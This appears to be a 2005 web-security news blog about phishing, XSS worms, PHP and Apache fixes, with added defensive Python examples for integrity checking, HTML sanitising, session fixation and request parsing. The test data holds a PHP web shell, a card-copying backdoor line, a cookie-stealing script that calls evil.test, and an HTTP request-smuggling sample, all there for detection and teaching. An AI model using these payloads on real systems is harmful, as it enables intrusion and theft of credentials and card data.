12/31/2005 Trojan Horse Program Targeting Adsense
Apparently someone is installing malware on users' computers in order to replace the ads displayed on websites they visit with their own.

"Techshout.com reports that a new, deceptive Trojan Horse program has surfaced. The program is engineered to produce fake Google ads that are formatted to look like legitimate ones. The ads are incorporated in Google AdSense, the program that lets website owners display ads from Google's list of advertisers. The Trojan Horse apparently downloads itself onto an unsuspecting computer through a web page and then replaces the original ads with its own set of malicious ads." - TechShout

Full Article Link: http://www.techshout.com/internet/2005/27/a-trojan-horse-program-that-targets-google-ads...
Link: Have a Site Suggestion, Material Request, or News? Submit it!
12/31/2005 Application Security Predictions For The Year 2006
In 2005 the number of published application security vulnerabilities exploded. If you're subscribed to mailing lists such as Bugtraq you know just how often Cross Site Scripting, SQL Injection, or Remote Command Execution vulnerabilities are discovered and exploited. I've prepared a prediction outline for the year 2006 covering exclusively the threats that the web brings.

Worms and Browser Vulnerabilities
2005 brought the first web application worm (as opposed to a web server worm) and a couple of spin-offs. The trend will of course continue, although I suspect 2006 will bring more criminal aspects. Currently the only web application worms (that we've seen) connect to IRC servers and seem to belong to 'hacking/script kid' groups.

The year 2005 has also brought a ton of browser-based vulnerabilities in most browsers, including Netscape, Internet Explorer, Firefox, and more. A mix of web application and browser-based worms will probably begin in 2006. Some of you remember the Nimda worm, and since then a worm exploiting both server and client hasn't been identified. Frankly I'm surprised we haven't seen any since, but with the recent interest in browser-based vulnerabilities I suspect this idea is going to catch on, and not just with hacking groups but also with organized crime. The potential here is endless (see Prediction #2 for an example of what I'm talking about).

Phishing and Cross Site Scripting
Phishing has become more widespread with no slowdown in sight. In 2005 multiple presentations, including one by Jeremiah Grossman at Black Hat and another by Billy Hoffman, outlined the combination of phishing and cross site scripting. These talks touched on the ability of an attacker to use known browser exploits to keep an interactive session between the victim's browser and the attacker, as well as to perform backend network scanning/exploitation via the XMLHttpRequest (AJAX) functionality that most browsers support. For years Cross Site Scripting has been a 'joke' to many people in the security industry. With new uses for cross site scripting being found every day I see the potential for XSS exploding, including its inclusion as a payload in future worms (traditional and web based) to help execute phishing attacks.

Web Application Backdooring
Millions of web applications process billions of dollars per year in transactions. Understanding how these applications work is fairly trivial, since a large majority of them are off-the-shelf open source or fairly cheap. We've seen people in the past install trojans and rootkits to gain control over a user's system in order to steal data including credit cards, social security numbers, game keys ;) etc. We've also seen breaches at large financial organizations where data was being stolen via website vulnerabilities such as SQL Injection. Something we haven't heard much about is web application backdooring. This happens when an attacker exploits a vulnerable web server and modifies an existing web application to perform new duties, or to copy transaction information. For years people have been tracking application integrity with tools such as Tripwire to see if an application has been modified, although this isn't practical in a large percentage of situations where a website is going through constant changes.
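As an added example (not from the original post and not Tripwire's code), the Python script below shows how integrity monitoring can stay practical on a site that changes all the time: directories expected to churn (uploads, caches) are excluded by name, so a modified checkout script or a newly dropped file under the application root still stands out. The file names, contents and the planted backdoor lines are constructed for the demonstration.

```python
"""Added example, not code from the original post or from Tripwire: a
file-integrity baseline for a deployed web application that ignores
directories expected to change (uploads, caches) so that a modified or
newly planted script still stands out. All paths and file contents below
are constructed for the demonstration."""
import hashlib
import os
import tempfile
from typing import Dict, Iterable, List


def build_manifest(root: str, exclude: Iterable[str] = ()) -> Dict[str, str]:
    """Map every file under `root` (path relative to root, '/' separated)
    to its SHA-256 digest, skipping top-level directories named in `exclude`."""
    excluded = set(exclude)
    manifest: Dict[str, str] = {}
    for dirpath, dirnames, filenames in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        if rel_dir != "." and rel_dir.split(os.sep)[0] in excluded:
            dirnames[:] = []  # prune: do not descend into excluded trees
            continue
        for name in sorted(filenames):
            full = os.path.join(dirpath, name)
            rel = name if rel_dir == "." else os.path.join(rel_dir, name)
            with open(full, "rb") as fh:
                manifest[rel.replace(os.sep, "/")] = hashlib.sha256(fh.read()).hexdigest()
    return manifest


def diff_manifests(baseline: Dict[str, str], current: Dict[str, str]) -> Dict[str, List[str]]:
    """Report files whose digest changed, files that appeared and files that vanished."""
    base, cur = set(baseline), set(current)
    return {
        "modified": sorted(p for p in base & cur if baseline[p] != current[p]),
        "added": sorted(cur - base),
        "removed": sorted(base - cur),
    }


def demo() -> Dict[str, List[str]]:
    """Constructed scenario: deploy a tiny PHP checkout app, take a baseline,
    then (1) an attacker appends a card-copying line to checkout.php and drops
    shell.php, while (2) a user legitimately uploads a photo. Only (1) must
    be reported."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "uploads"))
        deployed = {
            "index.php": b"<?php include 'checkout.php'; ?>\n",
            "checkout.php": b"<?php charge_card($_POST['cc']); ?>\n",
            "uploads/photo1.jpg": b"\xff\xd8\xff\xe0 constructed jpeg bytes",
        }
        for rel, data in deployed.items():
            with open(os.path.join(root, *rel.split("/")), "wb") as fh:
                fh.write(data)
        baseline = build_manifest(root, exclude=["uploads"])

        # (1) attacker: backdoor the existing script and plant a new one
        with open(os.path.join(root, "checkout.php"), "ab") as fh:
            fh.write(b"<?php file_put_contents('/tmp/.cc', $_POST['cc'], FILE_APPEND); ?>\n")
        with open(os.path.join(root, "shell.php"), "wb") as fh:
            fh.write(b"<?php system($_GET['c']); ?>\n")
        # (2) legitimate churn in an excluded directory
        with open(os.path.join(root, "uploads", "photo2.jpg"), "wb") as fh:
            fh.write(b"\xff\xd8\xff\xe0 another constructed photo")

        return diff_manifests(baseline, build_manifest(root, exclude=["uploads"]))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

In practice the baseline manifest and the verifier would live off the web server (or on read-only media), since an attacker who can edit checkout.php can just as easily edit a manifest stored beside it.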

RSS Feeds
Just like with any application, you must ensure that the data you're processing is properly sanitized. I suspect that we'll be seeing wide-scale abuse of RSS feeds in the near future. Having done some research on this myself (which I hope to publish soon), I think 2006 is going to be a very interesting year.
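Both the cross site scripting section above and this one come down to the same thing: HTML the site did not author, whether a feed item description or a user profile, must be reduced to a safe subset before it is rendered. As an added example (not from the original post), the Python sanitizer below does that with the standard-library HTMLParser: unknown tags, every attribute not explicitly allowed (which removes all on* handlers and style), script/style bodies, and href/src values whose scheme is not http, https or mailto are dropped. The FEED_ITEM fragment is constructed for the demonstration.

```python
"""Added example, not code from the original post: an allowlist HTML
sanitizer for RSS item descriptions (or any HTML the site did not author)
built on the standard-library HTMLParser. Everything not explicitly
allowed is dropped: unknown tags, all attributes other than the few listed
(which removes every on* handler and style=), script/style bodies, and
href/src values whose scheme is not http/https/mailto. The feed item in
FEED_ITEM is constructed for the demonstration."""
from html import escape
from html.parser import HTMLParser
from typing import List, Optional, Tuple
from urllib.parse import urlparse

ALLOWED_TAGS = {"p", "a", "b", "i", "em", "strong", "ul", "ol", "li", "br", "img"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt"}}
URL_ATTRS = {"href", "src"}
SAFE_SCHEMES = {"", "http", "https", "mailto"}  # "" means a relative URL
VOID_TAGS = {"br", "img"}
DROP_CONTENT = {"script", "style"}


def safe_url(value: Optional[str]) -> Optional[str]:
    """Return the URL if its scheme is allowed, else None. Control characters
    and spaces are removed first because browsers ignore them when reading
    the scheme, so 'java<TAB>script:' must be treated as 'javascript:'."""
    if value is None:
        return None
    cleaned = "".join(ch for ch in value if ord(ch) > 0x20)
    return cleaned if urlparse(cleaned).scheme in SAFE_SCHEMES else None


class FeedSanitizer(HTMLParser):
    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out: List[str] = []
        self.open: List[str] = []   # allowed tags currently open, for balancing
        self.dropping = 0           # >0 while inside <script>/<style>

    def handle_starttag(self, tag: str, attrs: List[Tuple[str, Optional[str]]]) -> None:
        if tag in DROP_CONTENT:
            self.dropping += 1
            return
        if self.dropping or tag not in ALLOWED_TAGS:
            return
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # drops onmouseover=, onerror=, style=, ...
            if name in URL_ATTRS:
                value = safe_url(value)
                if value is None:
                    continue  # javascript:, data:, vbscript: ... are gone
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self.open.append(tag)

    def handle_endtag(self, tag: str) -> None:
        if tag in DROP_CONTENT:
            self.dropping = max(0, self.dropping - 1)
            return
        if self.dropping or tag not in self.open:
            return
        while self.open:  # close anything still open inside this element
            opened = self.open.pop()
            self.out.append(f"</{opened}>")
            if opened == tag:
                break

    def handle_data(self, data: str) -> None:
        if not self.dropping:
            self.out.append(escape(data, quote=False))

    def result(self) -> str:
        self.close()
        while self.open:  # balance tags the feed left unclosed
            self.out.append(f"</{self.open.pop()}>")
        return "".join(self.out)


def sanitize(fragment: str) -> str:
    parser = FeedSanitizer()
    parser.feed(fragment)
    return parser.result()


# Constructed feed item carrying the usual tricks: an event handler, a
# javascript: link, an inline script and an onerror on an image.
FEED_ITEM = (
    '<p onmouseover="steal()">Breaking: <b>Tsunami appeal</b> '
    '<a href="javascript:alert(document.cookie)">donate</a> '
    '<a href="http://example.test/donate">here</a>'
    '<script>document.location="http://evil.test/?"+document.cookie</script>'
    '<img src="x" onerror="alert(1)"></p>'
)

if __name__ == "__main__":
    print(sanitize(FEED_ITEM))
```

The allowlist is the point: a blocklist of known-bad tags and attributes is what every feed reader and forum of the period shipped, and it is exactly what the encoding and scheme-obfuscation tricks get around.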

Conclusions
The Web Application Security space isn't dying any time soon :)

12/28/2005 More than 450 Phishing Attacks Used SSL in 2005
Netcraft has published some statistics about phishing on their site.

"In its first year, the Netcraft Toolbar Community has identified more than 450 confirmed phishing URLs using "https" urls to present a secure connection using the Secure Sockets Layer (SSL). The number of phishing attacks using SSL is significant for several reasons. Anti-phishing education initiatives have often urged Internet users to look for the SSL "golden lock" as an indicator of a site's legitimacy. Although phishers have been using SSL in attacks for more than a year, the trend seems to have drawn relatively little notice from users and the technology press.

Case in point: The use of SSL certificates in phishing scams made headlines in September when a security vendor issued a press release warning of a scam in which a spoofed phishing site used a self-signed certificate, presenting a gold lock icon but also triggering a browser warning that the certificate was not recognized. In this case, the phishers were banking on the likelihood that many users will trust the padlock and ignore the certificate warning. Despite the attention, the attack wasn't particularly new or novel." - Netcraft

Article Link: Netcraft Phishing Attack Statistics
12/27/2005 Security Vendors Form Application Security Industry Consortium (AppSIC)
Microsoft, Oracle, Red Hat, and SAP have reportedly formed a vendor-based security consortium titled "AppSIC", the Application Security Industry Consortium. Quoting the article:

"Herbert Thompson, the consortium's chair and director of security technology at Security Innovation, says AppSIC members will meet monthly to exchange ideas and vet papers to be issued under the AppSIC imprimatur.

"For instance, we'll publish the top 10 questions I'd need to ask my vendor on software security before I buy and the kinds of answers you should expect," Thompson says. "And we're going to help enterprises factor in security in their budgets, as well as help I.T. development groups increase software security." - CIO Today

News Link: Security Vendors Form Consortium (CIO Today Article)
AppSIC Website Link: http://www.appsic.org/
12/27/2005 Rootkits, cybercrime and OneCare By TheRegister
The Register has a short editorial outlining some of the highlights of 2005, including Sony's DRM rootkit, Microsoft OneCare, viruses, convictions, and phishing.

Article Link: Rootkits, cybercrime and OneCare: The year in IT security (TheRegister)
12/25/2005 Yahoo Cross Site Scripting Vulnerability Discovered
A posting to the Full Disclosure mailing list claims an unpatched Cross Site Scripting vulnerability in Yahoo! Mail, with example script code. Quoting the author:

"I didn't contact Yahoo, because I contacted them previously regarding a similar vulnerability, and yes, they fixed it "silently" without even sending me a thank-you email; frankly I didn't really appreciate that."

Oh and Happy Holidays.

Mailing List Post Link: Yahoo mail Cross Site Scripting vulnerability (Mail Posting)
12/23/2005 PAPER: Preventing Http Session Fixation Attacks
Zinho writes "I've published the final research about Http Session Fixation covering the most known attacks and how to prevent them. The paper is written from a web developer's point of view and shows various techniques to be safe from fixation and hijacking."

Paper Link: Preventing Http Session Fixation Attacks (Paper)
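The paper itself is not reproduced here. As an added example (not Zinho's code), the Python session store below applies the two defences a developer reaches for first: never adopt a session ID the server did not issue, and rotate the ID when the user authenticates, so an ID planted on the victim beforehand gives the attacker nothing after login. The scenario function walks through a fixation attempt with constructed timestamps and reports what the attacker ends up with.

```python
"""Added example, not code from the paper: a server-side session store with
the two defences against fixation a developer needs first. Client-supplied
IDs that the server never issued (or that have expired) are ignored and a
fresh anonymous ID is issued instead, and the ID is rotated on login so an
ID known to the attacker beforehand is dead afterwards. Times are passed
in explicitly so the scenario is deterministic."""
import secrets
from typing import Dict, Optional


class SessionStore:
    def __init__(self, idle_timeout: float = 900.0):
        self._sessions: Dict[str, dict] = {}
        self.idle_timeout = idle_timeout

    @staticmethod
    def _new_id() -> str:
        return secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG

    def resolve(self, cookie_sid: Optional[str], now: float) -> str:
        """Return the session ID this request will run under. Only an ID the
        server issued and that is not idle-expired is honoured; anything else
        (a planted or guessed value) is replaced by a fresh anonymous session,
        so the attacker cannot choose the victim's ID."""
        if cookie_sid is not None:
            sess = self._sessions.get(cookie_sid)
            if sess is not None and now - sess["last_seen"] <= self.idle_timeout:
                sess["last_seen"] = now
                return cookie_sid
            self._sessions.pop(cookie_sid, None)  # drop an expired entry
        sid = self._new_id()
        self._sessions[sid] = {"user": None, "last_seen": now}
        return sid

    def login(self, sid: str, user: str, now: float) -> str:
        """Authentication is a privilege change: move the state to a brand-new
        ID and invalidate the old one. The caller must set the new ID in the
        cookie (and never carry session IDs in URLs)."""
        self._sessions.pop(sid, None)
        new_sid = self._new_id()
        self._sessions[new_sid] = {"user": user, "last_seen": now}
        return new_sid

    def user_for(self, sid: str) -> Optional[str]:
        sess = self._sessions.get(sid)
        return sess["user"] if sess is not None else None


def fixation_scenario() -> Dict[str, bool]:
    """Constructed attack: the attacker obtains a real anonymous ID, plants it
    on the victim (via a cookie-setting XSS or a crafted link), the victim
    logs in, and the attacker then presents the planted ID."""
    store = SessionStore()
    t = 1_700_000_000.0
    planted = store.resolve(None, t)             # attacker's own anonymous session
    victim_sid = store.resolve(planted, t + 1)   # victim arrives with the planted ID
    shared_before_login = victim_sid == planted  # a valid server-issued ID is accepted
    victim_sid = store.login(victim_sid, "alice", t + 2)  # rotation on login
    hijacked = store.user_for(planted) == "alice"
    guessed = store.resolve("attacker-chosen-id", t + 3)  # never adopted as-is
    return {
        "shared_before_login": shared_before_login,
        "attacker_reads_victim_session": hijacked,
        "server_adopted_guessed_id": guessed == "attacker-chosen-id",
        "victim_still_logged_in": store.user_for(victim_sid) == "alice",
    }


if __name__ == "__main__":
    for check, outcome in fixation_scenario().items():
        print(f"{check}: {outcome}")
```

Note what the store does not do: it deliberately accepts the planted ID before login, because that ID is a real anonymous session. The defence is that nothing of value is attached to it until login, and login throws it away. Rotating again on any later privilege change (password change, role switch) follows the same pattern.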
12/21/2005 Top 7 PHP Security Blunders
SitePoint has published an article covering the 7 most common vulnerability types as they apply to PHP, as well as configuration options to further lock down your environment. While I disagree with the structure and the actual 7, the article is good and worth checking out.

If you're lazy and just want the seven, here they are. (I'm such a nice guy)

* Unvalidated Input Errors
* Access Control Flaws
* Session ID Prediction
* Cross Site Scripting
* SQL Insertion
* Error Reporting
* Data Handling Errors

Article Link: Top 7 PHP Security Blunders (SitePoint)
12/20/2005 "2005 The Year of Phishing"
Phishing has exploded in 2005, so I've decided to dedicate a section of this site to it. I have created a Phishing resource page providing a list of tools, news articles, whitepapers, and solutions to phishing. If there is a resource that I've missed, please let me know.

Phishing Link: Phishing HomePage
12/14/2005 Countering Trusting Trust through Diverse Double-Compiling
"An Air Force evaluation of Multics, and Ken Thompson's famous Turing award lecture "Reflections on Trusting Trust," showed that compilers can be subverted to insert malicious Trojan horses into critical software, including themselves. If this attack goes undetected, even complete analysis of a system's source code will not find the malicious code that is running, and methods for detecting this particular attack are not widely known. This paper describes a practical technique, termed diverse double-compiling (DDC), that detects this attack and some unintended compiler defects as well. Simply recompile the purported source code twice: once with a second (trusted) compiler, and again using the result of the first compilation. If the result is bit-for-bit identical with the untrusted binary, then the source code accurately represents the binary. This technique has been mentioned informally, but its issues and ramifications have not been identified or discussed in a peer-reviewed work, nor has a public demonstration been made. This paper describes the technique, justifies it, describes how to overcome practical challenges, and demonstrates it." - David Wheeler

Paper Link: Countering Trusting Trust through Diverse Double-Compiling
12/07/2005 Critical Myspace Vulnerabilities Leave Every Active Account Exploitable
A paper by Justin Lavoie titled "Critical Myspace Vulnerabilities Leave Every Active Account Exploitable" describes vulnerabilities in myspace.com's IM web application.

"In this advisory we will be detailing some very recent holes in the Myspace.com web-application. If you are not familiar with Myspace there is much information about the internet phenomenon on the web that will do better justice at describing what it is than I can here. Both vulnerabilities lie within the Instant Message (IM) feature from within the site. Proper manipulation of both exploits leaves every active account on Myspace a potential target." - Justin

Advisory Link: http://www.silent-products.com/advisory12.5.05.txt
11/30/2005 RSS Is Worm Bots Next Target
Yahoo! News has an interesting article on worm propagation via RSS feeds.

"David Sancho, senior anti-virus research engineer at Trend Micro, warned that RSS feed hijacking will become commonplace when Microsoft Corp. ships Internet Explorer 7, a browser refresh that will feature built-in RSS support.

In a white paper titled "The Future of Bot Worms," Sancho said the IE7 release "will open some interesting possibilities to worm creators." - Yahoo!

A whitepaper by Trend Micro describes the concept in more detail.

News Link: http://news.yahoo.com/s/zd/20051129/tc_zd/166349
Download The Paper: Trend Micro's "The Future of Bot Worms"
11/29/2005 OWASP vs WASC
CMP Media has written a nice comparison chart between WASC (an organization I co-founded :) and OWASP. While I may not agree with everything in this article, it does clearly outline a few key points between the two organizations. However, I *don't* agree with the following:

"Two organizations promise to help. The Open Web Application Security Project (OWASP) mainly targets software developers and the application architects who manage them, aiming to stamp out security bugs in the applications themselves. The Web Application Security Consortium (WASC) is broader, focusing on threat classification and all means of mitigation.

The two are sometimes seen as rivals because they were founded by competing penetration-testing firms and take different approaches to security. But for most enterprises, both approaches are necessary: OWASP can help harden applications, while WASC can help ensure that any remaining vulnerabilities aren't exploited. All their code and documentation is freely available for in-house use, so there's no reason not to select the best of both worlds." - CMP

<Start of Rant>
Now some people involved in WASC can be considered 'competition' (OWASP I'm sure has a few people competing against each other as well, which is normal), but I don't consider us rivals. I'd also like to clear up that the organization was founded by myself and a good friend of mine (who, yes, works at a firm :). While I do work for a security vendor, WASC was not created *solely* by vendors for the purpose of vendor interests. The purpose of WASC is to promote proper security practices regardless of the department you're in (IT Manager, QA/Tester, Developer, Architect, Penetration Tester, etc.) through education via our organization's "Projects". The GIF linked below also mentions that WASC doesn't release 'code'. At this time we have no immediate plans to release any code, but it isn't entirely ruled out (it is entirely dependent on a specific project's need).
<End of Rant>

Article Link: http://www.itarchitect.com/shared/article/showArticle.jhtml;jsessionid=IJ2R2BFMUGLHEQSNDBGCKH0CJUMEKJVN?articleId=172302482&pgno=2

Image Chart Link: http://i.cmpnet.com/networkmagazine/content/200511/2011tech2b.gif
11/15/2005 ModSecurity 1.9 FINAL has been released
Ivan Ristic writes "ModSecurity 1.9 FINAL has been released. It is available for immediate download from:

http://www.modsecurity.org/download/

After more than a year in development, ModSecurity 1.9 introduces a number of changes that further increase usefulness of this web application security tool.


Changes (since 1.8)
-------------------

Major enhancements include:
* A brand new audit logging subsystem aimed at supporting real time aggregation of the forensic logs. It is now possible to fine-tune forensic logging and even log complete responses.

* Significant rule engine enhancements that increase flexibility, introduce meta-data facilities, and allow for safe inclusion of third-party produced rule databases.

* A new stateful request monitoring mechanism, which includes tools for defence against Denial of Service attacks.

* Many smaller improvements throughout, including: performance measurement, ten new actions, seventeen new variables, output status filtering, performance improvements, support for methods other than GET and POST, ClamAV integration, and so on.

For a list with more details please visit:

http://www.modsecurity.org/blog/archives/2005/09/whats_new_in_mo.html "

11/7/2005 PHP Worm in the Wild
"Virus writers have created a Linux worm which uses a recently discovered vulnerability in XML-RPC for PHP, a popular open source component used in many applications, to attack vulnerable systems." - The Register

Article Link: http://www.theregister.co.uk/2005/11/07/linux_worm/
10/31/2005 PHP 4.4.1 Released
PHP 4.4.1 has been released to address multiple security vulnerabilities. From the announcement page:

"This is a bug fix release, which addresses some security problems too. The security issues that this release fixes are:

* Fixed a Cross Site Scripting (XSS) vulnerability in phpinfo() that could lead f.e. to cookie exposure, when a phpinfo() script is accidentally left on a production server.
* Fixed multiple safe_mode/open_basedir bypass vulnerabilities in ext/curl and ext/gd that could lead to exposure of files normally not accessible due to safe_mode or open_basedir restrictions.
* Fixed a possible $GLOBALS overwrite problem in file upload handling, extract() and import_request_variables() that could lead to unexpected security holes in scripts assumed secure. (For more information, see here).
* Fixed a problem when a request was terminated due to memory_limit constraints during certain parse_str() calls. In some cases this can result in register_globals being turned on.
* Fixed an issue with trailing slashes in allowed basedirs. They were ignored by open_basedir checks, so that specified basedirs were handled as prefixes and not as full directory names.
* Fixed an issue with calling virtual() on Apache 2. This allowed bypassing of certain configuration directives like safe_mode or open_basedir.
* Updated to the latest pcrelib to fix a possible integer overflow vulnerability announced in CAN-2005-2491.
"

Full PHP Announcement: http://www.php.net/release_4_4_1.php
PHP Changelog: http://www.php.net/ChangeLog-4.php#4.4.1
PHP Download Page: http://www.php.net/downloads.php
10/18/2005 Apache 1.3.34 Released!
Per the Apache mailing list:

" Apache HTTP Server 1.3.34 Released The Apache Software Foundation and The Apache HTTP Server Project are pleased to announce the release of version 1.3.34 of the Apache HTTP Server ("Apache"). This Announcement notes the significant changes in 1.3.34 as compared to 1.3.33. This Announcement1.3 document may also be available in multiple languages at:

http://www.apache.org/dist/httpd

This version of Apache is principally a bug and security fix release. A partial summary of the bug fixes is given at the end of this document. A full listing of changes can be found in the CHANGES file. Of particular note is that 1.3.34 addresses and fixes 2 potential security issues:

* If a request contains both Transfer-Encoding and Content-Length headers, remove the Content-Length, mitigating some HTTP Request Splitting/Spoofing attacks.

* Added TraceEnable [on|off|extended] per-server directive to alter the behavior of the TRACE method.

We consider Apache 1.3.34 to be the best version of Apache 1.3 available and we strongly recommend that users of older versions, especially of the 1.1.x and 1.2.x family, upgrade as soon as possible. No further releases will be made in the 1.2.x family.

Apache 1.3.34 is available for download from:

http://httpd.apache.org/download.cgi " - Apache
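As an added example (not Apache's code), the Python parser below implements the first of those two changes and shows why it matters: when a request carries both Transfer-Encoding and Content-Length, Content-Length is discarded and the body is framed by chunked coding, while a second function frames the very same bytes the way a hop that honours Content-Length would, so the leftover it would treat as the start of a second request is visible. It goes a little beyond the Apache change by also rejecting conflicting Content-Length values. SMUGGLED is a constructed request.

```python
"""Added example, not Apache code: handling of a request that carries both
Transfer-Encoding and Content-Length. parse_request() discards
Content-Length when Transfer-Encoding is present and frames the body by
chunked coding (the Apache 1.3.34 behaviour); it also rejects conflicting
Content-Length values, which goes beyond that change. SMUGGLED is a
constructed request; naive_content_length_body() shows how a hop that
honours Content-Length instead splits the same bytes."""
from typing import Dict, List, Tuple

CRLF = b"\r\n"


def _parse_headers(head: bytes) -> Dict[str, List[str]]:
    """Header block (request line included, skipped) -> lowercase name -> values."""
    headers: Dict[str, List[str]] = {}
    for line in head.split(CRLF)[1:]:
        if not line:
            continue
        name, sep, value = line.partition(b":")
        if not sep:
            raise ValueError(f"malformed header line: {line!r}")
        headers.setdefault(name.strip().lower().decode("ascii"), []).append(
            value.strip().decode("latin-1"))
    return headers


def _dechunk(data: bytes) -> bytes:
    """Decode a chunked body; ValueError if the terminating 0-chunk is missing."""
    body, pos = b"", 0
    while True:
        eol = data.find(CRLF, pos)
        if eol < 0:
            raise ValueError("incomplete chunk size line")
        size = int(data[pos:eol].split(b";")[0], 16)  # ignore chunk extensions
        pos = eol + 2
        if size == 0:
            return body
        if len(data) < pos + size + 2:
            raise ValueError("incomplete chunk data")
        body += data[pos:pos + size]
        pos += size + 2  # chunk data is followed by its own CRLF


def parse_request(raw: bytes) -> dict:
    """Parse one HTTP/1.x request; Transfer-Encoding wins over Content-Length."""
    head, sep, rest = raw.partition(CRLF + CRLF)
    if not sep:
        raise ValueError("incomplete header block")
    method, target, version = head.split(CRLF, 1)[0].decode("ascii").split(" ", 2)
    headers = _parse_headers(head)
    dropped: List[str] = []
    if "transfer-encoding" in headers and "content-length" in headers:
        del headers["content-length"]  # the 1.3.34 mitigation
        dropped.append("content-length")
    if "transfer-encoding" in headers:
        codings = [c.strip().lower() for v in headers["transfer-encoding"] for c in v.split(",")]
        if codings[-1] != "chunked":
            raise ValueError("final transfer-coding must be chunked")
        body = _dechunk(rest)
    elif "content-length" in headers:
        values = set(headers["content-length"])
        if len(values) != 1:
            raise ValueError("conflicting Content-Length values")
        length = int(values.pop())
        if len(rest) < length:
            raise ValueError("incomplete body")
        body = rest[:length]
    else:
        body = b""
    return {"method": method, "target": target, "version": version,
            "headers": headers, "body": body, "dropped": dropped}


def naive_content_length_body(raw: bytes) -> Tuple[bytes, bytes]:
    """What a hop that trusts Content-Length sees: (body, bytes left over that
    it would parse as the beginning of the next request on the connection)."""
    head, _, rest = raw.partition(CRLF + CRLF)
    length = int(_parse_headers(head).get("content-length", ["0"])[0])
    return rest[:length], rest[length:]


# Constructed request: Content-Length says 4 bytes, chunking says 'hello'.
SMUGGLED = (b"POST /donate HTTP/1.1\r\nHost: example.test\r\n"
            b"Content-Length: 4\r\nTransfer-Encoding: chunked\r\n\r\n"
            b"5\r\nhello\r\n0\r\n\r\n")

if __name__ == "__main__":
    print(parse_request(SMUGGLED)["body"], naive_content_length_body(SMUGGLED))
```

The leftover bytes are the whole attack: on a connection shared between a proxy and the origin, a second hop that framed the request differently would prepend them to the next client's request. Dropping Content-Length on the server side only helps when every hop in front of it agrees; the safer fix is to reject such requests outright.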

10/13/2005 Cross-Site Scripting Worm Hits MySpace
A cgisecurity reader writes "One clever MySpace user looking to expand his buddy list recently figured out how to force others to become his friend, and ended up creating the first self-propagating cross-site scripting (XSS) worm. In less than 24 hours, "Samy" had amassed over 1 million friends on the popular online community."

Article Link: http://www.betanews.com/article/CrossSite_Scripting_Worm_Hits_MySpace/1129232391
10/12/2005 The Cross-site Scripting Virus
Wade Alcorn has written an academic paper outlining the use of Cross Site Scripting as a vector for launching viruses that is certainly worth the read. I'm glad to see new uses for existing issues most consider minor. 2005 has certainly been an interesting year for expanding XSS-based attacks.

Article Link: http://www.bindshell.net/papers/xssv.html
10/10/2005 Google fixes Web site security bug
"Who Cares" writes "Google has fixed a security flaw on its Web site that opened the door to phishing scams, account hijacks and other attacks, security researchers said Monday."

Story Link: http://news.com.com/Google+fixes+Web+site+security+bug/2100-1002_3-5892525.html?part=rss&tag=5892525&subj=news
10/08/2005 Web Hacking "Directory Traversal" Conviction
As a warning to those of you 'poking' around suspicious websites: an Englishman was convicted for executing a directory traversal attack against a suspicious site. I find a conviction for sending 2 web requests rather disturbing. Sadly these types of convictions will probably happen more and more often.

"Cuthbert is accused of attempting a directory traversal attack on the donate.bt.com site which handles credit card payments on behalf of the Disasters Emergency Committee.

Giving evidence on his own behalf, Cuthbert, at times near tears, said he had made a £30 donation to the site, after clicking on a banner advert. Because he received no final thank-you or confirmation page he became concerned it may have been a phishing site, so he carried out two tests to check the security of the site." - The Register

"During the trial, Cuthbert's defence argued that any unauthorised access was entirely innocent. In evidence it was shown that he had attempted to access the tsunami donations site on two occasions and the site's security systems had denied him access.

The defence also pointed out that Cuthbert had not attempted to defraud the site. Security expert Peter Sommer is concerned by the conviction.

"Nobody thought he was doing anything significant or malicious, and there was a strong argument that the police should have given him a slap on the wrists and not prosecuted," said Sommer, senior research fellow at the London School of Economics' Information Systems Integrity Group." - ZDNet


The Register Link: http://www.theregister.co.uk/2005/10/06/tsunami_hacker_convicted/
The Register Link: http://www.theregister.co.uk/2005/10/05/dec_case/
ZDNet Link: http://news.zdnet.co.uk/internet/0,39020369,39226979,00.htm
10/08/2005 Web Application Firewall Evaluation Criteria Document Released
The Web Application Security Consortium has released a document entitled "Web Application Firewall Evaluation Criteria".

"The goal of this project is to develop a detailed web application firewall evaluation criteria; a testing methodology that can be used by any reasonably skilled technician to independently assess the quality of a WAF solution. Furthermore, we want to limit the complexity of the criteria to have the evaluation process (of a single product) last two hours or less." - Web Application Firewall Evaluation Criteria Project

This project is led by Ivan Ristic, the author of the popular open source web application firewall ModSecurity.

Article Link: Web Application Firewall Evaluation Criteria Document
09/24/2005 Exploiting the XmlHttpRequest object in IE - Referrer spoofing, and a lot more By Amit Klein
"XmlHttpRequest is a Javascript object that allows a client side Javascript code to send almost raw HTTP requests to the origin host and to access the response's body in raw form. As such, XmlHttpRequest is a core component of AJAX.

It seems that the same origin security policy ensures that the power of XmlHttpRequest is only used in a secure manner (after all, if the Javascript code can only access the server it originated from, then what harm can be done, except for XSS conditions), but this is not so. In fact, about 2.5 years ago I noticed a problem in XmlHttpRequest's implementation in IE - IE doesn't validate some critical fields that are provided by the user [1]. Back at that time, the attack vector was through an XSS condition, but the basic flaw (and other, related flaws) renders itself nicely to other conditions, which we'll see below." - Amit Klein

Article Link: Exploiting the XmlHttpRequest object in IE - Referrer spoofing, and a lot more..., By Amit Klein, September 2005
09/21/2005 Phishing Filter in IE7
Microsoft is including a 'Phishing Filter' in IE7 that automatically checks sites against a known list of 'bad sites' and prompts the user with a warning. You can read more about this at Microsoft's IE blog (screenshots included!).

Phishing Filter Link: http://blogs.msdn.com/ie/archive/2005/09/09/463204.aspx
09/21/2005 IE7 Security in Brief
Microsoft's IE blog has an interesting peek at some of the new security features that IE7 will bring.

"We heard people ask for more separation between the browser and Windows. In IE7, we built a containment wall around IE by running it in Protected Mode. In this mode, IE can browse the web but cannot install software (good or bad) or change settings on the user’s computer without explicit user consent. Because the foundation work to make this possible is in Windows Vista, this feature is not available on the XP version of IE7. Expect to read more about the details of how this works, and how IE balances compatibility (e.g. users still want their toolbars to work!) with security, in another post.

